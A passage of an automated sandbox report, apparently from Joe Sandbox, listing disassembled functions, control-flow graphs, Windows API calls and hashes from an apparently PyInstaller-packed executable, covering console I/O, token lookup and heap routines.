                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F216051F1C64291FA20BB60E805BBAA260BF88354FF00132E59DC65D5FF2CE90DC722
                                                                                                                                                                                                                                        Function 00007FF78DA6BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 744 7ff78da6bacc-7ff78da6baf2 745 7ff78da6bb0d-7ff78da6bb11 744->745 746 7ff78da6baf4-7ff78da6bb08 call 7ff78da64f58 call 7ff78da64f78 744->746 748 7ff78da6bee7-7ff78da6bef3 call 7ff78da64f58 call 7ff78da64f78 745->748 749 7ff78da6bb17-7ff78da6bb1e 745->749 764 7ff78da6befe 746->764 766 7ff78da6bef9 call 7ff78da6a950 748->766 749->748 752 7ff78da6bb24-7ff78da6bb52 749->752 752->748 753 7ff78da6bb58-7ff78da6bb5f 752->753 756 7ff78da6bb78-7ff78da6bb7b 753->756 757 7ff78da6bb61-7ff78da6bb73 call 7ff78da64f58 call 7ff78da64f78 753->757 762 7ff78da6bee3-7ff78da6bee5 756->762 763 7ff78da6bb81-7ff78da6bb87 756->763 757->766 767 7ff78da6bf01-7ff78da6bf18 762->767 763->762 768 7ff78da6bb8d-7ff78da6bb90 763->768 764->767 766->764 768->757 771 7ff78da6bb92-7ff78da6bbb7 768->771 773 7ff78da6bbb9-7ff78da6bbbb 771->773 774 7ff78da6bbea-7ff78da6bbf1 771->774 777 7ff78da6bbbd-7ff78da6bbc4 773->777 778 7ff78da6bbe2-7ff78da6bbe8 773->778 775 7ff78da6bbc6-7ff78da6bbdd call 7ff78da64f58 call 7ff78da64f78 call 7ff78da6a950 774->775 776 7ff78da6bbf3-7ff78da6bc1b call 7ff78da6d66c call 7ff78da6a9b8 * 2 774->776 805 7ff78da6bd70 775->805 807 7ff78da6bc1d-7ff78da6bc33 call 7ff78da64f78 call 7ff78da64f58 776->807 808 7ff78da6bc38-7ff78da6bc63 call 7ff78da6c2f4 776->808 777->775 777->778 779 7ff78da6bc68-7ff78da6bc7f 778->779 782 7ff78da6bcfa-7ff78da6bd04 call 7ff78da7398c 779->782 783 7ff78da6bc81-7ff78da6bc89 779->783 794 7ff78da6bd8e 782->794 795 7ff78da6bd0a-7ff78da6bd1f 782->795 783->782 786 7ff78da6bc8b-7ff78da6bc8d 783->786 786->782 792 7ff78da6bc8f-7ff78da6bca5 786->792 792->782 797 7ff78da6bca7-7ff78da6bcb3 792->797 803 7ff78da6bd93-7ff78da6bdb3 ReadFile 794->803 795->794 799 7ff78da6bd21-7ff78da6bd33 GetConsoleMode 795->799 797->782 801 7ff78da6bcb5-7ff78da6bcb7 797->801 799->794 804 7ff78da6bd35-7ff78da6bd3d 799->804 801->782 806 7ff78da6bcb9-7ff78da6bcd1 801->806 809 7ff78da6bead-7ff78da6beb6 GetLastError 803->809 810 7ff78da6bdb9-7ff78da6bdc1 803->810 804->803 813 7ff78da6bd3f-7ff78da6bd61 ReadConsoleW 804->813 816 7ff78da6bd73-7ff78da6bd7d call 7ff78da6a9b8 805->816 806->782 817 7ff78da6bcd3-7ff78da6bcdf 806->817 807->805 808->779 814 7ff78da6beb8-7ff78da6bece call 7ff78da64f78 call 7ff78da64f58 809->814 815 7ff78da6bed3-7ff78da6bed6 809->815 810->809 811 7ff78da6bdc7 810->811 819 7ff78da6bdce-7ff78da6bde3 811->819 821 7ff78da6bd63 GetLastError 813->821 822 7ff78da6bd82-7ff78da6bd8c 813->822 814->805 826 7ff78da6bedc-7ff78da6bede 815->826 827 7ff78da6bd69-7ff78da6bd6b call 7ff78da64eec 815->827 816->767 817->782 825 7ff78da6bce1-7ff78da6bce3 817->825 819->816 829 7ff78da6bde5-7ff78da6bdf0 819->829 821->827 822->819 825->782 833 7ff78da6bce5-7ff78da6bcf5 825->833 826->816 827->805 836 7ff78da6be17-7ff78da6be1f 829->836 837 7ff78da6bdf2-7ff78da6be0b call 7ff78da6b6e4 829->837 833->782 840 7ff78da6be9b-7ff78da6bea8 call 7ff78da6b524 836->840 841 7ff78da6be21-7ff78da6be33 836->841 844 7ff78da6be10-7ff78da6be12 837->844 840->844 845 7ff78da6be8e-7ff78da6be96 841->845 846 7ff78da6be35 841->846 844->816 845->816 848 7ff78da6be3a-7ff78da6be41 846->848 849 7ff78da6be7d-7ff78da6be88 848->849 850 7ff78da6be43-7ff78da6be47 848->850 849->845 851 7ff78da6be49-7ff78da6be50 850->851 852 7ff78da6be63 850->852 851->852 853 7ff78da6be52-7ff78da6be56 851->853 854 7ff78da6be69-7ff78da6be79 852->854 853->852 856 7ff78da6be58-7ff78da6be61 853->856 854->848 855 7ff78da6be7b 854->855 855->845 856->854
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                        • Instruction ID: 46536c5922b77fcf228592f417f6fff557ab2719c0fd3e374e782951251f6bed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89C1C42290C686D1E761AB95A440ABDB764FB81B80FF54131EA4E07791EF7CEC4DC722
                                                                                                                                                                                                                                        Function 00007FF78DA58760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                        • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                        • Instruction ID: f8e6b55bf8febffb97b263d3788e4d42a3d97327b0c6da191260e4d70d237ae6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0210821A0C64241DB50ABA5F454639E7B0FF957F0FB00235E6AD836E4EF6CD849C751
                                                                                                                                                                                                                                        Function 00007FF78DA590E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: GetCurrentProcess.KERNEL32 ref: 00007FF78DA58780
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: OpenProcessToken.ADVAPI32 ref: 00007FF78DA58793
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: GetTokenInformation.KERNELBASE ref: 00007FF78DA587B8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: GetLastError.KERNEL32 ref: 00007FF78DA587C2
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: GetTokenInformation.KERNELBASE ref: 00007FF78DA58802
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF78DA5881E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA58760: CloseHandle.KERNEL32 ref: 00007FF78DA58836
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF78DA53C55), ref: 00007FF78DA5916C
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF78DA53C55), ref: 00007FF78DA59175
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                        • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction ID: 38e73d5a21fb3f93e953ea29d9bf16f4ca47bb2623f3a6aed64981b9c0a68c54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75213021A0C74281E650BB50E515AEAA360FF88740FF44435EA4D977C6EF3CDD09C761
                                                                                                                                                                                                                                        Function 00007FF78DA6CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 963 7ff78da6cfd0-7ff78da6cff5 964 7ff78da6cffb-7ff78da6cffe 963->964 965 7ff78da6d2c3 963->965 967 7ff78da6d037-7ff78da6d063 964->967 968 7ff78da6d000-7ff78da6d032 call 7ff78da6a884 964->968 966 7ff78da6d2c5-7ff78da6d2d5 965->966 970 7ff78da6d06e-7ff78da6d074 967->970 971 7ff78da6d065-7ff78da6d06c 967->971 968->966 973 7ff78da6d076-7ff78da6d07f call 7ff78da6c390 970->973 974 7ff78da6d084-7ff78da6d099 call 7ff78da7398c 970->974 971->968 971->970 973->974 978 7ff78da6d1b3-7ff78da6d1bc 974->978 979 7ff78da6d09f-7ff78da6d0a8 974->979 980 7ff78da6d1be-7ff78da6d1c4 978->980 981 7ff78da6d210-7ff78da6d235 WriteFile 978->981 979->978 982 7ff78da6d0ae-7ff78da6d0b2 979->982 983 7ff78da6d1fc-7ff78da6d20e call 7ff78da6ca88 980->983 984 7ff78da6d1c6-7ff78da6d1c9 980->984 987 7ff78da6d237-7ff78da6d23d GetLastError 981->987 988 7ff78da6d240 981->988 985 7ff78da6d0c3-7ff78da6d0ce 982->985 986 7ff78da6d0b4-7ff78da6d0bc call 7ff78da64830 982->986 1011 7ff78da6d1a0-7ff78da6d1a7 983->1011 990 7ff78da6d1cb-7ff78da6d1ce 984->990 991 7ff78da6d1e8-7ff78da6d1fa call 7ff78da6cca8 984->991 993 7ff78da6d0df-7ff78da6d0f4 GetConsoleMode 985->993 994 7ff78da6d0d0-7ff78da6d0d9 985->994 986->985 987->988 989 7ff78da6d243 988->989 996 7ff78da6d248 989->996 997 7ff78da6d254-7ff78da6d25e 990->997 998 7ff78da6d1d4-7ff78da6d1e6 call 7ff78da6cb8c 990->998 991->1011 1001 7ff78da6d1ac 993->1001 1002 7ff78da6d0fa-7ff78da6d100 993->1002 994->978 994->993 1004 7ff78da6d24d 996->1004 1005 7ff78da6d2bc-7ff78da6d2c1 997->1005 1006 7ff78da6d260-7ff78da6d265 997->1006 998->1011 1001->978 1009 7ff78da6d189-7ff78da6d19b call 7ff78da6c610 1002->1009 1010 7ff78da6d106-7ff78da6d109 1002->1010 1004->997 1005->966 1012 7ff78da6d267-7ff78da6d26a 1006->1012 1013 7ff78da6d293-7ff78da6d29d 1006->1013 1009->1011 1016 7ff78da6d10b-7ff78da6d10e 1010->1016 1017 7ff78da6d114-7ff78da6d122 1010->1017 1011->996 1020 7ff78da6d26c-7ff78da6d27b 1012->1020 1021 7ff78da6d283-7ff78da6d28e call 7ff78da64f34 1012->1021 1022 7ff78da6d2a4-7ff78da6d2b3 1013->1022 1023 7ff78da6d29f-7ff78da6d2a2 1013->1023 1016->1004 1016->1017 1018 7ff78da6d124 1017->1018 1019 7ff78da6d180-7ff78da6d184 1017->1019 1024 7ff78da6d128-7ff78da6d13f call 7ff78da73a58 1018->1024 1019->989 1020->1021 1021->1013 1022->1005 1023->965 1023->1022 1029 7ff78da6d177-7ff78da6d17d GetLastError 1024->1029 1030 7ff78da6d141-7ff78da6d14d 1024->1030 1029->1019 1031 7ff78da6d16c-7ff78da6d173 1030->1031 1032 7ff78da6d14f-7ff78da6d161 call 7ff78da73a58 1030->1032 1031->1019 1034 7ff78da6d175 1031->1034 1032->1029 1036 7ff78da6d163-7ff78da6d16a 1032->1036 1034->1024 1036->1031
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78DA6CFBB), ref: 00007FF78DA6D0EC
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78DA6CFBB), ref: 00007FF78DA6D177
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                        • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction ID: efd69b98e21019b401265085879c1c833b68bf936a8468d575a5dc7f2dee6407
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F910972F0C651D5FB50AFA5A440A7DABA0BB44BC8FB44135DE0E17684EE38DC4AC722
                                                                                                                                                                                                                                        Function 00007FF78DA65698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                        • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction ID: 38bb47b91681e90e3759e5caa50946c98ba77ec29ab84b318196f2ebe460bc12
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D41A362D1C781C3E314ABA1A514779A260FF94754F709334EA9C03AD1EF6DE8E8C721
                                                                                                                                                                                                                                        Function 00007FF78DA5CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                        • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction ID: 8b5a625c377fdb515b2202e9c594f6b6adbb8d029a8a1063439ad87e4e09b1ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C313812E0D24291EA54BBA5A451BB9A7A1BF41784FF40434D94ED72DBFE2CAC4CC223
                                                                                                                                                                                                                                        Function 00007FF78DA69AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                        • Instruction ID: f50a2b0ba1f7e0d10460c0c42d4e45bf090ac420850252fcc64b8b90719086e3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14D06750B0C64682EA547FB1689987892917F58B51BB41838D84B16393FD2CEC4EC322
                                                                                                                                                                                                                                        Function 00007FF78DA601AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction ID: 89a0d66e74d23778988640b6be1af4073295565d8ca227545b3d57bf77b45270
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA51F721A0D641C6E734AEB5A440E7AA291BF44FA4FB44630DE6D037C5EF3CDC89C626
                                                                                                                                                                                                                                        Function 00007FF78DA6C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction ID: 49b95c72ff14f870fe2760da0d9a5e477aba02d8da39df5412afdba00879666b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611E26170CA4181DA10BB65B804569A761BB45BF0FB40331EE7D4B7D8EF3CD809C702
                                                                                                                                                                                                                                        Function 00007FF78DA6A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
